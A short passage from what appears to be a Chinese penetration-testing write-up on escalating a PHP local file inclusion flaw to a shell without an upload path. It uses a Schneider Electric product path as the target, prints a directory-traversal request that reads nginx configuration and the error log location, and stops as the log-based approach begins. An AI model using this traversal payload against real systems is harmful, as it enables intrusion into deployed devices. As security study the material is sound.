0前言
在WEB渗透测试中尤其是PHP,经常会挖到LFI漏洞,想要GETSHELL,但无奈没有文件上传的途径,这里给一个思路,抛砖引玉。
近日施耐德电气爆出的漏洞,首先得到了一个本地包含,在这里作为靶目标使用。
1.本地获得利用思路
umotion/themes/schneider/include/css.php?css=../../../../../../../etc/nginx&theme=ivory&version=11028
1.1 得到nginx配置
通过文件包含,枚举得到nginx的配置文件。
/etc/nginx/nginx.conf
配置文件中获得了nginx错误日志的路径,且关闭了访问日志。
error_log /var/log/nginx_error.log;
access_log off;
1.2 利用思路整理
那么我们可以利用错